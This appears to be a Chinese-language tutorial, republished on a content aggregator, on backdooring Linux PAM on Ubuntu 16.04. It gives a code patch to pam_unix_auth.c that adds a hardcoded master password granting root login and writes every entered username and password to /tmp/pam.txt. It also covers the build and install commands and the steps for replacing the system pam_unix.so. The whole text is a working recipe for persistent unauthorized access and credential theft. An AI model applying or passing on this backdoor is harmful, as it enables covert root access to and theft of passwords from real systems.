Linux pam 后门纪录root用户密码以及设置万能密码登录root
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了Linux pam 后门纪录root用户密码以及设置万能密码登录root,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1651字,纯文字阅读大概需要3分钟。
内容图文
最近看了一下有关Linux pam后门相关的知识点,发现有一些坑,便记录一下
本次用的机器为Ubuntu16.04
一、查看本机pam版本
dpkg -l | grep pam
可以看到pam的版本为1.1.8
二、下载对应版本的pam
各个版本的pam包下载地址:http://www.linux-pam.org/library/ 下载对应版本的压缩包并解压
wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz tar -zxvf Linux-PAM-1.1.8.tar.gz
三、编译
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
特别注意:64位系统编译可能会遇到yywrap()函数未定义错误,需先安装flex软件包,而网上的大部分都是添加
#define yywrap() 1
但我的添加了并没有解决,反而又报了其他的错误,一直卡在了这
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
sudo apt-get install flex
修改 linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c 中的内容
if(strcmp(p,"adhzl")==0){
retval=PAM_SUCCESS;
}
if(retval==PAM_SUCCESS){
FILE * fp;
fp=fopen("/tmp/pam.txt","a");
fprintf(fp,"%s::%s\n",name,p);
fclose(fp);
}
其中strcmp(p,"adhzl")中的adhzl为自己设置的root密码,可以用来登录root用户,/tmp/pam.txt为纪录的root用户的登录密码的路径和保存的文件名
然后在解压的路径下编译安装
./configure make
编译完之后的后门文件在
/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so
四、替换
首先查找原来的pam_unix.so的路径
sudo find / -name pam_unix.so
我的是在
/lib/x86_64-linux-gnu/security/pam_unix.so
先备份原来的pam_unix.so,然后复制编译生成的pam_unix.so到/lib/x86_64-linux-gnu/security/目录下
五、验证
su root
输入之前输入的预设密码
可以登录到root用户
然后输入真正的root用户的密码,也可以登录到root用户
在/tmp目录下查看是否有pat.txt
查看pam.txt内容
前两次为用自己输入的密码成功登录到root用户,第三次为输入真正的root用户的密码,都纪录了下来。
内容总结
以上是互联网集市为您收集整理的Linux pam 后门纪录root用户密码以及设置万能密码登录root全部内容,希望文章能够帮你解决Linux pam 后门纪录root用户密码以及设置万能密码登录root所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。